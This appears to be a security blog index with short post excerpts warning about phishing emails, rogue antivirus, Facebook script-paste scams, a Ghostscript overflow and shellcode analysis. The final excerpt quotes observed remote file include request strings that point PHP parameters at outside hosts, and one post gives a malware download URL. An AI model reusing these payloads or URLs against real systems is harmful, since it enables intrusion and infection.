blogs

Today many PC users are easy to forget Windows passwords they set for their computers. Windows Password Unlocker Standard is designed to help users recover forgotten Windows administrator password and other user password by burning a bootable CD/DVD. If you’ve forgot Windows password, you try this Windows password recovery tool and follow the below instructions to recover your lost password.

Before starting, a bootable CD/DVD and a computer with CD drive are required. (Internal CD drive and external CD drive are both OK.)  read more »

The most popular trend in nowadays Internet scam is fake and rogue antispyware. Such antispyware try to convince users that they have plenty of infections to remove showing basically the same alerts and nag screens as regular software products combating viruses.  read more »

It seems that spammers are now started using well known LinkedIn.com website to spam users. i got a message from a unknown user stating me to connect to his network on linkedin.But then when i carefully looked at the links i found that the links int he email does not points to the linkedin.com but they point to hxxp://lccvnvxx.info/

see the image below:

So if you have receive any such invitation to connect on linked,then double check it!!

I use facebook to connect with my friends. few days back i received an applciation invite named "10 lies girls tell guys.." from a friend of mine. since it was from a trusted person and titile is catchy,i decided to try this app.
but to my surpirse, when i opned the application it gives and window with instruction like : press ctrl + c then press alt+d then press ctrl +v after that press enter.  read more »

Spammers has now started using google feed proxy link to avoid detection.today i recived following email:

as you can see it uses following link:
http://feedproxy.google.com/~r/juy7/~3/cy83akSysSk
its just a 301 redirect:

and the end result is following:

lets see what will be the next!!

Secgeeks.com is back after having lots of downtime. we are receiving lots of traffic(means we are improving) so we are facing downtime with our hosts. hopefully we will manage it now!!

Some of you know him while some of you don't know. For some it is a news and for some it is not. +Favia was an outstanding reverse engineer,who has inspired many people in Reverse Engineering.He passed away in may at the age of 56.
it is a sad news.
Rest in Peace, +Fravia. You won’t be forgotten.

Seems that people are using Michael Jackson's name to spread the malwares. i have receveied this mail:

this mail has a link : www.facebook.com which actually points to:
hzzp://210.188.255.10/~yamazaki/MichaelJackson.jpg.exe

which is a backdoor. see the full report here.

I have received this mail today:
"Dear windows User,

Following a recent outbreak of the conflicker worm also known as downadup or trojan/brisv.a affecting over 15million Microsoft Windows users.. Merely
visiting a lot of popular sites could have gotten you infected. The virus exploited a vulnerability in all windows versions and products including the windows xp and vista operating systems. Researchers at Microsoft have
been working closely with Symantec, the creators of Norton antivirus and have come up with a removal tool for the conflicker virus. The average anti-virus  read more »

So after adobe,its in GhostScript.There is a patch as follows:
699 if (exrunlength > params->SDNUMEXSYMS - j)

here the vulnerable parameter is exrunlength,if its large then there is a overflow.
read more here.

Often in some exploit analysis we need to analyze the shellcode,what it does and how.There are many ways you can do it.but the most simple way is to use following link:
http://sandsprite.com/shellcode_2_exe.php
Just copy paste your shellcode and it will give you a exe containing shellcode.then you can simply run it in ollydebugger and step in. sometimes shellcode is encrypted using the XOR but that is very simple to decode.
Hope it helps ..

Cheers,
SecGeek

I was reading this story
from the article:
"The BBC has deliberately hacked into 22,000 PCs to prove the power of botnets, and the damage that can be done with a network of compromised computers.

Click – BBC News’ technology programme – with the help of anti-virus company Prevx, took over thousands of computers in order to demonstrate a growing problem in the modern world.  read more »

I received this mail:

Subject of mail is catchy and anyone can get diverted to it.at a first look url also seems to be coming from facebook but in fact it is not.
look at the highlighted url.thats the original url.so beware of it.

If you work with packets,network protocols then i am sure you have lots of problem in modifying them.currently there are limited number of tools which allows to edit the packets.today i was playing with pcapr and i found it awesome.it has all the features which are required.you can upload packets,browse other dumps,modify dumps and download them.good thing for your toolbox.you can access it here.

I was reading this article at darknet .it provides a analysis of the PHPBB user password.It means what kind of password general users keeps.The analysis has some strange result stating that most of the password are very common and you can easily find them online here.
I have not used PHPBB much and i dont remember if it forces a miminal password lenght or complexity.  read more »

In penetration testing often we need a tool which can scan the network and identify the vulnerability,here is one of them called metascanner.you can download it from here.

I come to know about it today from fulldiscloser list.you can download it here.

Strange,every site i m searching right now on google is coming with a message this site may harm your computer in search result.see bellow:

is it i m alone or other are also facing this problems?

Previously i posted an article on secgeeks.com regarding remote file include vulnerabilities,i am constantly seeing and increase in such requests . following url contains so called malicious files(adding them with request file):
secure.php?cfgProgDir=http://www.kmt-s.ru/chid.txt???

//sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=http://203.114.112.155/webboard1234/1.jpg?

minibb/index.php?absolute_path=http://www.beautifulchurch.org/images/main/main.js

cyberfolio/portfolio/msg/view.php?av=http://www.sacot-dz.com/webmail/logs/log.txt????  read more »